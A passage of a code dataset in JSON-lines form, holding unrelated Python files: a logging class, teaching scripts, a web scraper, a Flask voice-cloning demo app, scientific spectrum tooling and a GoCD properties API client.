wlsdeploy.logging.platform_logger import PlatformLogger\nfrom wlsdeploy.util.enum import Enum\n\nSTANDALONE = 'STANDALONE'\nTOOL = 'TOOL'\n\n\nclass ValidatorLogger(PlatformLogger):\n\n def __init__(self, logger_name, mode_type=TOOL,\n resource_bundle_name='oracle.weblogic.deploy.messages.wlsdeploy_rb'):\n PlatformLogger.__init__(self, logger_name, resource_bundle_name)\n self._mode_type = mode_type\n # The logger properties is set to level FINE, which is for tool mode. Reset that to FINER for\n # standalone mode. 
This will of course not help the standalone user that wants FINE level\n # but the logs are for WDT troubleshooting.\n if self.get_level() == Level.FINE and self._mode_type == STANDALONE:\n self.set_level(Level.FINER)\n\n def info(self, message, *args, **kwargs):\n \"\"\"\n Log an info-level message.\n :param message: the message key\n :param args: the arguments to use to populate the message placeholders\n :param kwargs: the keyword arguments\n \"\"\"\n method = kwargs.pop('method_name', None)\n clazz = kwargs.pop('class_name', None)\n error = kwargs.pop('error', None)\n level = Level.INFO\n if self._mode_type == TOOL:\n level = Level.FINE\n record = self._get_log_record(level, clazz, method, message, error, *args)\n self.logger.log(record)\n","sub_path":"core/src/main/python/wlsdeploy/tool/validate/validator_logger.py","file_name":"validator_logger.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"366381174","text":"# lists = used to store multiple items in a single variable\n\nfood = [\"pizza\", \"hamburgers\", \"hotdog\", \"spaghetti\", \"pudding\"]\n\n#food[0] = \"Sushi\"\n#food.append(\"ice cream\")\n#food.remove(\"hotdog\")\n#food.pop()\n#food.insert(0, \"cake\")\n#food.insert(19, \"hello\")\n#food.sort()\n#food.clear()\n\n#print(food[0])\n\nfor x in food:\n print(x)\n\n\n","sub_path":"lists.py","file_name":"lists.py","file_ext":"py","file_size_in_byte":332,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"483581972","text":"#+\n# This module defines routine to ease getting/setting lots of attributes\n# on an object at once. Routines provided are:\n#\n# * getattrs -- bulk retrieving of attribute values\n# * setattrs -- bulk setting of attribute values (can be used with result returned from getattrs)\n# * pushattrs -- bulk setting of attribute values and saving of previous values\n# * popattrs -- restores attribute values changed by pushattrs (just another name for setattrs)\n# * delattrs -- bulk deletion of attributes\n#\n# See the docstrings for more details.\n#\n# Copyright 2013, 2014 by Lawrence D'Oliveiro .\n# Licensed under CC-BY-SA .\n#-\n\ndef getattrs(obj, attrnames) :\n \"returns a dictionary of the current values of the specified attributes of\\n\" \\\n \"the specified object. attrnames must be a list or tuple of attribute name strings.\"\n result = {}\n for attr in attrnames :\n result[attr] = getattr(obj, attr)\n #end for\n return \\\n result\n#end getattrs\n\ndef _setattrs_common(obj, setattr, args, kwargs) :\n # common code for both setattrs and pushattrs\n if (len(args) != 0) == (len(kwargs) != 0) :\n raise TypeError(\"specify attrs via either sequence/dict or keyword args, not both\")\n #end if\n if len(args) != 0 :\n if len(args) != 1 :\n raise TypeError(\"only one additional non-keyword arg allowed\")\n #end if\n attrset = args[0]\n if type(attrset) in (list, tuple) :\n for arg in attrset :\n key, val = arg\n setattr(obj, key, val)\n #end for\n elif type(attrset) == dict :\n for key in attrset :\n setattr(obj, key, attrset[key])\n #end for\n else :\n raise TypeError(\"type of arg must be list, tuple or dict\")\n #end if\n elif len(kwargs) != 0 :\n for attr in kwargs :\n setattr(obj, attr, kwargs[attr])\n #end for\n #end if\n#end _setattrs_common\n\ndef setattrs(obj, *args, **kwargs) :\n \"does bulk setting of attributes on obj. 
Call this in any of the following ways:\\n\" \\\n \"\\n\" \\\n \" setattrs(obj, ((key, val), (key, val) ...))\\n\" \\\n \" setattrs(obj, {key : val, key : val ...})\\n\" \\\n \" setattrs(obj, key = val, key = val ...)\\n\" \\\n \"\\n\" \\\n \"in each case, “key” is the name of an attribute of the object, and “val” is the\\n\" \\\n \"new value to assign to it. In the first two cases, the key must be a string; in the\\n\" \\\n \"last case, it is an unquoted word as per usual Python keyword-argument syntax.\\n\"\n _setattrs_common(obj, setattr, args, kwargs)\n#end setattrs\n\ndef pushattrs(obj, *args, **kwargs) :\n \"similar to settatrs, but returns a dict mapping attribute names to previous values\" \\\n \" for all attributes which were set. This can be passed to popattrs/setattrs to\" \\\n \" restore the previous values.\"\n prevattrs = {}\n def pushattr(obj, key, val) :\n prevattrs[key] = getattr(obj, key)\n setattr(obj, key, val)\n #end pushattr\n#begin pushattrs\n _setattrs_common(obj, pushattr, args, kwargs)\n return \\\n prevattrs\n#end pushattrs\n\npopattrs = setattrs\n # alternative name for symmetry with pushattrs\n\ndef delattrs(obj, attrnames, ignore_error = False) :\n \"deletes the specified attributes from the specified object. attrnames must be\\n\" \\\n \"a tuple or list of string attribute names. ignore_error can be set to True\\n\" \\\n \"to quietly ignore deletion failures.\"\n for attr in attrnames :\n try :\n delattr(obj, attr)\n except AttributeError as fail :\n if not ignore_error :\n raise\n #end if\n #end try\n #end for\n#end delattrs\n","sub_path":"attrs_useful.py","file_name":"attrs_useful.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"457286817","text":"'''\nUsing a map to store the count of characters from the first String and subtracting the count from the map while iterating the second string.\n\nGiven the strings are of same length.\n'''\n\ndef isPermutation1(s,t):\n if len(s) != len(t):\n return False\n map = {}\n for i in s:\n if i in map:\n map[i] = map[i] + 1\n else:\n map[i] = 1\n\n for i in t:\n if i not in map:\n return False\n map[i] = map[i] - 1\n\n for x in map.values():\n if x != 0:\n return False\n\n return True\n","sub_path":"Chapter_1/1.2.1_is_permutation.py","file_name":"1.2.1_is_permutation.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"352554792","text":"from django.urls import path\n\nfrom producto.views import ProducListView\nfrom .import views\n\nurlpatterns = [\n path('producto/', ProducListView.as_view(), name='index'),\n path('producto/borrar/', views.borrar_producto, name='borrar_producto'),\n path('producto/formulario/', views.nuevo_producto, name='nuevo_producto'),\n path('producto/editar/', views.editar_producto, name='editar_producto'),\n path('get_all_products', views.GetAllProduct.as_view()),\n #path('', views.marca, name='marca'),\n\n]","sub_path":"producto/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"619472269","text":"#!/usr/bin/env python\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom StellarSpectra.grid_tools import HDF5Interface\nfrom StellarSpectra.model import Model, ModelHA\n\n\n'''\nDesigned to interrogate how instrumental convolution and downsampling the grid may affect the 
accuracy of the final\ngenerated spectra. Basically, we want to find the minimal resolution such that we are still under some stated\naccuracy in parameters (for example 10 K, 0.05 dex in logg and Z).\n\n'''\n\ndef get_resid_spec(base, offset):\n '''\n Given a base spectrum and a spectrum slightly offset, return the residual spectrum between the two\n '''\n #Normalize both spectra\n base /= np.mean(base)\n offset /= np.mean(offset)\n\n #return the absolute \"error\"\n return np.abs((base - offset)/base)\n\ndef get_min_spec(spec_list):\n '''\n Given a list of residual spectra, created with `create_resid_spec', determine for each pixel the minimum offset so\n that we can use this as an error envelope in the approximate spectra.\n '''\n\n #For each pixel, take the smallest value\n #Vstack the arrays and take the min along axis=1\n arr = np.vstack(spec_list)\n return np.min(arr, axis=0)\n\nclass AccuracyComparison:\n '''\n Gather the data products necessary to make a test about accuracy of the reduced grid sizes.\n\n '''\n\n def __init__(self, DataSpectrum, Instrument, LibraryHA, LibraryLA, parameters, deltaParameters):\n '''Initialize the comparison object.\n\n :param DataSpectrum: the spectrum that provides a wl grid + natural resolution\n :type DataSpectrum: :obj:`grid_tools.DataSpectrum`\n :param Instrument: the instrument object on which the DataSpectrum was acquired (ie, TRES, SPEX...)\n :type Instrument: :obj:`grid_tools.Instrument`\n :param LibraryHA: the path to the native resolution spectral library\n :type LibraryHA: string\n :param LibraryLA: the path to the approximate spectral library\n :type LibraryLA: string\n\n '''\n\n self.DataSpectrum = DataSpectrum\n self.Instrument = Instrument\n\n self.HDF5InterfaceHA = HDF5Interface(LibraryHA)\n self.HDF5InterfaceLA = HDF5Interface(LibraryLA)\n\n print(\"Bounds of the grids are\")\n print(\"HA\", self.HDF5InterfaceHA.bounds)\n print(\"LA\", self.HDF5InterfaceLA.bounds)\n\n #If the DataSpectrum contains more than one order, we only take the first one. 
To get behavior with a\n # different order, you should only load that via the DataSpectrum(orders=[22]) flag.\n self.wl = self.DataSpectrum.wls[0]\n\n self.fullModelLA = Model(self.DataSpectrum, self.Instrument, self.HDF5InterfaceLA, stellar_tuple=(\"temp\",\n \"logg\", \"Z\", \"vsini\", \"vz\", \"logOmega\"), cheb_tuple=(\"c1\", \"c2\", \"c3\"), cov_tuple=(\"sigAmp\",\n \"logAmp\", \"l\"), region_tuple=(\"loga\", \"mu\", \"sigma\"))\n self.modelLA = self.fullModelLA.OrderModels[0]\n\n\n self.fullModelHA = ModelHA(self.DataSpectrum, self.Instrument, self.HDF5InterfaceHA, stellar_tuple=(\"temp\",\n \"logg\", \"Z\", \"vsini\", \"vz\", \"logOmega\"), cheb_tuple=(\"c1\", \"c2\", \"c3\"), cov_tuple=(\"sigAmp\",\n \"logAmp\", \"l\"), region_tuple=(\"loga\", \"mu\", \"sigma\"))\n self.modelHA = self.fullModelHA.OrderModels[0]\n\n self.parameters = parameters\n self.deltaParameters = deltaParameters\n\n self.base = self.get_specHA(self.parameters)\n self.baseLA = self.get_specLA(self.parameters)\n self.approxResid = get_resid_spec(self.base, self.baseLA) #modelHA - modelLA @ parameters\n\n def get_specHA(self, parameters):\n '''\n Update the model and then query the spectrum\n\n :param parameters: Dictionary of fundamental stellar parameters\n :type parameters: dict\n\n :returns: flux spectrum\n '''\n\n params = parameters.copy()\n params.update({\"vsini\":0., \"vz\":0, \"logOmega\":0.})\n self.fullModelHA.update_Model(params)\n\n return self.modelHA.get_spectrum()\n\n def get_specLA(self, parameters):\n '''\n Update the model and then query the spectrum\n\n :param parameters: Dictionary of fundamental stellar parameters\n :type parameters: dict\n\n :returns: flux spectrum\n '''\n\n params = parameters.copy()\n params.update({\"vsini\":0., \"vz\":0, \"logOmega\":0.})\n self.fullModelLA.update_Model(params)\n\n return self.modelLA.get_spectrum()\n\n def createEnvelopeSpectrum(self, direction='both'):\n '''\n The parameters should always be specified at a grid point of the HDF5 file.\n\n For this, do the deltaParameters interpolation.\n\n Direction specifies whether to do interpolation up (+ 10 K, etc.), down (- 10 K), or\n do both and then find the minimum envelope between the two.\n For now, only up is implemented.\n\n '''\n #For each key, add the delta parameters\n temp_params = self.parameters.copy()\n temp_params[\"temp\"] += self.deltaParameters[\"temp\"]\n temp_spec = get_resid_spec(self.base, self.get_specHA(temp_params))\n\n logg_params = self.parameters.copy()\n logg_params[\"logg\"] += self.deltaParameters[\"logg\"]\n logg_spec = get_resid_spec(self.base, self.get_specHA(logg_params))\n\n Z_params = self.parameters.copy()\n Z_params[\"Z\"] += self.deltaParameters[\"Z\"]\n Z_spec = get_resid_spec(self.base, self.get_specHA(Z_params))\n\n self.envelope = get_min_spec([temp_spec, logg_spec, Z_spec])\n\n def plot_quality(self):\n '''\n Visualize the quality of the interpolation.\n\n Two-panel plot.\n\n Top: HA and LA spectrum\n\n Bottom: Residual between HA + LA spectrum and the HA spectrum error bounds for deltaParameters\n\n '''\n\n self.createEnvelopeSpectrum()\n\n fig, ax = plt.subplots(nrows=2, figsize=(8,6), sharex=True)\n ax[0].plot(self.wl, self.base, \"b\", label=\"HA\")\n ax[0].plot(self.wl, self.baseLA, \"r\", label=\"LA\")\n ax[0].legend()\n ax[0].set_ylabel(r\"$\\propto f_\\lambda$\")\n ax[0].set_title(\"Temp={temp:} logg={logg:} Z={Z:}\".format(**self.parameters))\n\n ax[1].semilogy(self.wl, self.approxResid, \"k\", label=\"(HA - LA)/HA\")\n ax[1].semilogy(self.wl, 
self.envelope, \"b\", label=\"Interp Envelope\")\n ax[1].legend()\n ax[1].set_xlabel(r\"$\\lambda$\\AA\")\n ax[1].set_ylabel(\"fractional error\")\n\n return fig\n\n\ndef main():\n from StellarSpectra.spectrum import DataSpectrum\n from StellarSpectra.grid_tools import TRES\n\n myDataSpectrum = DataSpectrum.open(\"../../data/WASP14/WASP14-2009-06-14.hdf5\", orders=np.array([22]))\n myInstrument = TRES()\n\n myComp = AccuracyComparison(myDataSpectrum, myInstrument, \"../../libraries/PHOENIX_submaster.hdf5\",\n \"../../libraries/PHOENIX_objgrid6000.hdf5\",\n {\"temp\":6000, \"logg\":4.5, \"Z\":-0.5}, {\"temp\":10, \"logg\":0.05, \"Z\": 0.05})\n\n myComp.plot_quality()\n\nif __name__==\"__main__\":\n main()","sub_path":"tests/accuracy/grid_accuracy.py","file_name":"grid_accuracy.py","file_ext":"py","file_size_in_byte":7078,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"538223452","text":"# -*- coding: utf-8 -*-\r\nimport scrapy\r\nfrom extractor.in_port_info import InPortInfo\r\n\r\n\r\nclass ExtractInSpider(scrapy.Spider):\r\n name = \"in_port\"\r\n allowed_domains = ['www.carnoc.com']\r\n start_urls = ['http://data.carnoc.com/corp/airport/cgq__airportflight.html']\r\n\r\n def parse(self, response):\r\n node_list = response.xpath(\"//div[@class='arrive left']/ul/div[@id='icefable1']/li\")\r\n # print(len(node_list))\r\n items = []\r\n for node in node_list:\r\n item = InPortInfo()\r\n\r\n item['flight_id'] = node.xpath(\"./span[1]/text()\").extract()[0]\r\n\r\n # 始发地\r\n item['origin'] = node.xpath(\"./span[@class='flt_city']/text()\").extract()[0]\r\n # 接机楼\r\n item['origin_terminal'] = node.xpath(\"./span[@class='terminal']/text()\").extract()[0]\r\n\r\n item['take_off_time'] = node.xpath(\"./span[4]/text()\").extract()[0]\r\n\r\n item['take_off_real_time'] = node.xpath(\"./span[5]/text()\").extract()[0]\r\n\r\n item['origin_state'] = node.xpath(\"./span[6]/text()\").extract()[0]\r\n\r\n items.append(item)\r\n\r\n return items\r\n","sub_path":"extractor/spiders/extract_in.py","file_name":"extract_in.py","file_ext":"py","file_size_in_byte":1153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"392982220","text":"# import modules\n\n# initialize variables\nALPHABET = \"ABCDEFGHIJKLMNOPQRSTUVWXYZ\"\noutput = \"\"\n\n# define functions\n\n\ndef file_read(file_name):\n # read in file, replace newline characters, convert to uppercase and return\n file_obj = open(file_name, 'r')\n file_content = file_obj.read()\n file_obj.close()\n file_content = file_content.replace('\\n', ' ')\n file_content = file_content.upper()\n return file_content\n\n\ndef file_write(file_name, file_content):\n # write out file_content to file_name\n file_obj = open(file_name, 'w')\n file_obj.write(file_content)\n file_obj.close()\n\n\ndef make_keyphrase(word1, word2, message_len):\n # keyphrase = concantonated keywords times (integer of (length of message\n # divided by length of keyword) plus one)\n words = word1 + word2\n final_phrase = words * (int(message_len/len(words))+1)\n return final_phrase\n\n\n# get user input\n# encrypt or decrypt\nchoice = \"\"\nwhile choice != \"e\" and choice != \"d\":\n choice = input(\"Encrypt or Decrypt message? 
e/d \")\n choice = choice.lower()\n\n# keywords -> convert to uppercase\ncipherword_1 = input(\"Enter your first cipher word: \")\ncipherword_1 = cipherword_1.upper()\ncipherword_2 = input(\"Enter your second cipher word: \")\ncipherword_2 = cipherword_2.upper()\n\n# encrypt\nif choice == \"e\":\n # read in plaintext file\n message = file_read('A453_CA3_Task3_plaintext.txt')\n message_length = len(message)\n\n # generate keyphrase\n keyphrase = make_keyphrase(cipherword_1, cipherword_2, message_length)\n\n # loop through message\n for i in range(message_length):\n\n # if character is space, append to plaintext message\n if message[i] == \" \":\n output = output + \" \"\n else:\n\n # determine alphabet index of message character and equivilent\n # keypharse character. increase each index by 1\n x = ALPHABET.index(message[i]) + 1\n y = ALPHABET.index(keyphrase[i]) + 1\n\n # add index values together to get cypher character index\n # handle values greater than 26 using modulo maths\n z = (x + y) % 26\n\n # append cypher character to encrypted message\n output = output + ALPHABET[z-1]\n\n # write out encripted file\n file_write('A453_CA3_Task3_encripted.txt', output)\n\n# decrypt\nelse:\n # read in encripted file\n message = file_read('A453_CA3_Task3_encripted.txt')\n message_length = len(message)\n\n # generate keyphrase\n keyphrase = make_keyphrase(cipherword_1, cipherword_2, message_length)\n\n # loop through message\n for i in range(message_length):\n\n # if character is space, append to plaintext message\n if message[i] == \" \":\n output = output + \" \"\n else:\n\n # determine alphabet index of message character and equivilent\n # keypharse character. increase each index by 1\n x = ALPHABET.index(message[i]) + 1\n y = ALPHABET.index(keyphrase[i]) + 1\n\n # add 26 to message index then subtract keyphrase index.\n # handle values greater than 26 using modulo maths\n z = ((x + 26) - y) % 26\n\n # append plaintext character to decrypted message\n output = output + ALPHABET[z-1]\n\n # write our plaintext file\n file_write('A453_CA3_Task3_decripted.txt', output)\n\nprint(\"Process complete\")\n","sub_path":"assessments/ocr/2014/A453_CA3_Task3.py","file_name":"A453_CA3_Task3.py","file_ext":"py","file_size_in_byte":3380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"345383711","text":"# -*- coding: utf-8 -*-\nimport sys\nfrom flask import Flask, render_template, redirect, url_for, request, send_from_directory\nimport numpy as np\nimport os\nimport uuid\nfrom synthesizer.inference import Synthesizer\nfrom encoder import inference as encoder\nfrom vocoder import inference as vocoder\nfrom pathlib import Path\nimport librosa\nfrom pydub import AudioSegment\nimport subprocess\nimport time\nimport wave\n\nsynthesizer = None\n\n\ndef init_model():\n enc_model_fpath = \"/home/ilseo/source/Real-Time-Voice-Cloning/encoder/saved_models/batch64_10_e256_val_12_epoch.pt\"\n syn_model_dir = \"/home/ilseo/source/Real-Time-Voice-Cloning/synthesizer/saved_models/logs-synth_kr_epoch12_508k_steps/\"\n voc_model_fpath = \"/home/ilseo/source/Real-Time-Voice-Cloning/vocoder/saved_models/dim256_gta_bs256_epoch_12_508k_20190926/dim256_gta_bs256_epoch_12_508k_20190926.pt\"\n\n enc_path = Path(enc_model_fpath)\n syn_path = Path(syn_model_dir)\n voc_path = Path(voc_model_fpath)\n encoder.load_model(enc_path)\n global synthesizer\n synthesizer = Synthesizer(syn_path.joinpath(\"taco_pretrained\"))\n vocoder.load_model(voc_path)\n\n\ndef create_app():\n app = 
Flask(__name__)\n\n def run_on_start():\n init_model()\n\n run_on_start()\n return app\n\n\ntmp_dir = \"/home/ilseo/source/Real-Time-Voice-Cloning/static/tmp\"\nos.makedirs(tmp_dir, exist_ok=True)\nwav_result_dir = \"/home/ilseo/source/Real-Time-Voice-Cloning/static/result\"\nos.makedirs(wav_result_dir, exist_ok=True)\napp = create_app()\n\n\n# app = Flask(__name__)\n\n@app.route(\"/upload\")\ndef upload():\n return render_template(\"upload.html\")\n\n\n@app.route(\"/index\")\ndef index():\n return render_template(\"recorder.html\")\n\n\n@app.route(\"/record\", methods=['POST', 'GET'])\ndef record():\n f = request.files['audio']\n filename = str(uuid.uuid4())\n ext = os.path.splitext(request.files['audio'].filename)[1]\n text_list = request.form.get('text_list', default=\"텍스트를 입력하라 말이여.\")\n text_list = text_list.split(os.linesep)\n print(text_list)\n f.save(os.path.join(tmp_dir, filename + ext))\n\n if ext.lower() in [\".mp3\", \".m4a\"]:\n command = \"avconv -i %s %s\" % (os.path.join(tmp_dir, filename + ext), os.path.join(tmp_dir, filename + \".wav\"))\n\n subprocess.call(command, shell=True)\n target_wav_path = os.path.join(tmp_dir, filename + \".wav\")\n target_filename = filename + \".wav\"\n filename_list = []\n elapsed_list = []\n result_text_list = []\n for j, text in enumerate(text_list):\n text = text.strip()\n if len(text) == 0:\n continue\n result_text_list.append(text)\n ## Load the models one by one.\n print(\"Preparing the encoder, the synthesizer and the vocoder...\")\n\n ## Computing the embedding\n # First, we load the wav using the function that the speaker encoder provides. This is\n # important: there is preprocessing that must be applied.\n\n # The following two methods are equivalent:\n # - Directly load from the filepath:\n # preprocessed_wav = encoder.preprocess_wav(target_wav_path)\n # - If the wav is already loaded:\n start = time.time()\n original_wav, sampling_rate = librosa.load(target_wav_path)\n preprocessed_wav = encoder.preprocess_wav(original_wav, sampling_rate)\n print(\"Loaded file succesfully\")\n\n embed = encoder.embed_utterance(preprocessed_wav)\n print(\"Created the embedding\")\n\n # The synthesizer works in batch, so you need to put your data in a list or numpy array\n texts = [text]\n embeds = [embed]\n # If you know what the attention layer alignments are, you can retrieve them here by\n # passing return_alignments=True\n specs = synthesizer.synthesize_spectrograms(texts, embeds)\n spec = specs[0]\n print(\"Created the mel spectrogram\")\n\n ## Generating the waveform\n print(\"Synthesizing the waveform:\")\n # Synthesizing the waveform is fairly straightforward. 
Remember that the longer the\n # spectrogram, the more time-efficient the vocoder.\n generated_wav = vocoder.infer_waveform(spec)\n\n ## Post-generation\n # There's a bug with sounddevice that makes the audio cut one second earlier, so we\n # pad it.\n generated_wav = np.pad(generated_wav, (0, synthesizer.sample_rate), mode=\"constant\")\n\n # Save it on the disk\n tmp_filename = \"%s_%d.wav\" % (filename, j)\n audio_path = os.path.join(wav_result_dir, tmp_filename)\n librosa.output.write_wav(audio_path, generated_wav.astype(np.float32),\n synthesizer.sample_rate)\n filename_list.append(tmp_filename)\n elapsed_list.append(str(time.time() - start))\n\n wavs = [AudioSegment.from_wav(os.path.join(wav_result_dir, wav)) for wav in filename_list]\n combined = wavs[0]\n for wav in wavs[1:]:\n combined = combined.append(wav)\n join_filename = \"%s_join.wav\" % filename\n combined.export(os.path.join(wav_result_dir, join_filename), format=\"wav\")\n\n return render_template(\"synth.html\", file_list=filename_list, target_filename=target_filename,\n text_list=result_text_list,\n elapsed_list=elapsed_list, len=len(filename_list), join_filename=join_filename,\n all_text=\" \".join(result_text_list))\n\n\n@app.after_request\ndef add_header(r):\n \"\"\"\n Add headers to both force latest IE rendering engine or Chrome Frame,\n and also to cache the rendered page for 10 minutes.\n \"\"\"\n r.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n r.headers[\"Pragma\"] = \"no-cache\"\n r.headers[\"Expires\"] = \"0\"\n r.headers['Cache-Control'] = 'public, max-age=0'\n return r\n\n\n@app.route('/download/', methods=['GET', 'POST'])\ndef download(filename):\n return send_from_directory(directory=wav_result_dir, filename=filename, as_attachment=True)\n\n\n@app.route('/download_mp3/', methods=['GET', 'POST'])\ndef download_mp3(filename):\n new_filename = os.path.splitext(filename)[0] + \".mp3\"\n AudioSegment.from_wav(os.path.join(wav_result_dir, filename)).export(os.path.join(wav_result_dir, new_filename),\n format=\"mp3\")\n return send_from_directory(directory=wav_result_dir, filename=new_filename, as_attachment=True)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True, threaded=False)\n","sub_path":"web.py","file_name":"web.py","file_ext":"py","file_size_in_byte":6505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"110531808","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n###############################################################################\n# The MIT License\n#\n# Copyright (c) 2016 Grigory Chernyshev\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n#\n###############################################################################\n\nfrom six import StringIO\nimport csv\n\nfrom yagocd.resources import BaseManager\n\n\nclass PropertyManager(BaseManager):\n \"\"\"\n The properties API allows managing of job properties.\n \"\"\"\n\n def __init__(\n self,\n session,\n pipeline_name=None,\n pipeline_counter=None,\n stage_name=None,\n stage_counter=None,\n job_name=None\n ):\n \"\"\"\n Constructs instance of ``PropertyManager``.\n Parameters to the constructor and methods of the class could be duplicated. That is because of two use cases\n of this class:\n 1. When the class being instantiated from :class:`yagocd.client.Client`, we don't know all the necessary\n parameters yet, but we need an instance to work with. So we skip parameters instantiation in constructor,\n but require them for each method.\n 2. When the class being used from :class:`yagocd.resources.job.JobInstance` - in this case we already\n know all required parameters, so we can instantiate `PropertyManager` with them.\n\n :param session: session object from client.\n :type session: yagocd.session.Session.\n :param pipeline_name: name of the pipeline.\n :param pipeline_counter: pipeline counter.\n :param stage_name: name of the stage.\n :param stage_counter: stage counter.\n :param job_name: name of the job.\n \"\"\"\n super(PropertyManager, self).__init__(session)\n\n self.base_api = self._session.base_api(api_path='')\n\n self._pipeline_name = pipeline_name\n self._pipeline_counter = pipeline_counter\n self._stage_name = stage_name\n self._stage_counter = stage_counter\n self._job_name = job_name\n\n def list(\n self,\n pipeline_name=None,\n pipeline_counter=None,\n stage_name=None,\n stage_counter=None,\n job_name=None\n ):\n \"\"\"\n Lists all job properties.\n\n :param pipeline_name: name of the pipeline.\n :param pipeline_counter: pipeline counter.\n :param stage_name: name of the stage.\n :param stage_counter: stage counter.\n :param job_name: name of the job.\n :return: dictionary of properties.\n :rtype: dict[str, str]\n \"\"\"\n assert self._pipeline_name or pipeline_name\n assert self._pipeline_counter or pipeline_counter\n assert self._stage_name or stage_name\n assert self._stage_counter or stage_counter\n assert self._job_name or job_name\n\n response = self._session.get(\n path='{base_api}/properties/{pipeline_name}/{pipeline_counter}/{stage_name}/{stage_counter}/{job_name}'.format(\n base_api=self.base_api,\n pipeline_name=self._pipeline_name or pipeline_name,\n pipeline_counter=self._pipeline_counter or pipeline_counter,\n stage_name=self._stage_name or stage_name,\n stage_counter=self._stage_counter or stage_counter,\n job_name=self._job_name or job_name\n ),\n headers={'Accept': 'application/json'},\n )\n text = StringIO(response.text)\n parsed = list(csv.reader(text))\n properties = dict(zip(parsed[0], parsed[1]))\n\n return properties\n\n def get(\n self,\n name,\n pipeline_name=None,\n pipeline_counter=None,\n stage_name=None,\n stage_counter=None,\n job_name=None\n ):\n \"\"\"\n Gets a property by its name.\n :info: You can use keyword `latest` as a pipeline counter or a stage counter.\n\n :param name: name of property to get.\n :param pipeline_name: name of the pipeline.\n :param 
pipeline_counter: pipeline counter.\n :param stage_name: name of the stage.\n :param stage_counter: stage counter.\n :param job_name: name of the job.\n :return: single property as a dictionary.\n \"\"\"\n assert self._pipeline_name or pipeline_name\n assert self._pipeline_counter or pipeline_counter\n assert self._stage_name or stage_name\n assert self._stage_counter or stage_counter\n assert self._job_name or job_name\n\n response = self._session.get(\n path='{base_api}/properties/{pipeline_name}/{pipeline_counter}/{stage_name}/{stage_counter}/{job_name}/{name}'.format(\n base_api=self.base_api,\n pipeline_name=self._pipeline_name or pipeline_name,\n pipeline_counter=self._pipeline_counter or pipeline_counter,\n stage_name=self._stage_name or stage_name,\n stage_counter=self._stage_counter or stage_counter,\n job_name=self._job_name or job_name,\n name=name\n ),\n headers={'Accept': 'application/json'},\n )\n text = StringIO(response.text)\n parsed = list(csv.reader(text))\n properties = dict(zip(parsed[0], parsed[1]))\n\n return properties\n\n def historical(self, pipeline_name=None, stage_name=None, job_name=None, limit_pipeline=None, limit_count=None):\n \"\"\"\n Get historical properties.\n :info: `limitPipeline` and `limitCount` are optional parameters. The default value of\n `limitPipeline` is latest pipeline instance’s counter. The default value of `limitCount` is `100`.\n\n :param pipeline_name: name of the pipeline.\n :param stage_name: name of the stage.\n :param job_name: name of the job.\n :param limit_pipeline: pipeline limit for returned properties.\n :param limit_count: count limit for returned properties.\n :return: list of dictionaries as historical values.\n \"\"\"\n assert self._pipeline_name or pipeline_name\n assert self._stage_name or stage_name\n assert self._job_name or job_name\n\n params = {\n 'pipelineName': self._pipeline_name or pipeline_name,\n 'stageName': self._stage_name or stage_name,\n 'jobName': self._job_name or job_name,\n }\n if limit_pipeline is not None:\n params['limitPipeline'] = limit_pipeline\n if limit_count is not None:\n params['limitCount'] = limit_count\n\n response = self._session.get(\n path='{base_api}/properties/search'.format(base_api=self.base_api),\n params=params,\n headers={'Accept': 'application/json'},\n )\n\n text = StringIO(response.text)\n result = list(csv.DictReader(text))\n\n return result\n\n def create(\n self,\n name,\n value,\n pipeline_name=None,\n pipeline_counter=None,\n stage_name=None,\n stage_counter=None,\n job_name=None\n ):\n \"\"\"\n Defines a property on a specific job instance.\n\n :param name: name of property.\n :param value: value of property.\n :param pipeline_name: name of the pipeline.\n :param pipeline_counter: pipeline counter.\n :param stage_name: name of the stage.\n :param stage_counter: stage counter.\n :param job_name: name of the job.\n :return: an acknowledgement that the property was created.\n \"\"\"\n assert self._pipeline_name or pipeline_name\n assert self._pipeline_counter or pipeline_counter\n assert self._stage_name or stage_name\n assert self._stage_counter or stage_counter\n assert self._job_name or job_name\n\n response = self._session.post(\n path='{base_api}/properties/{pipeline_name}/{pipeline_counter}/{stage_name}/{stage_counter}/{job_name}/{name}'.format(\n base_api=self.base_api,\n pipeline_name=self._pipeline_name or pipeline_name,\n 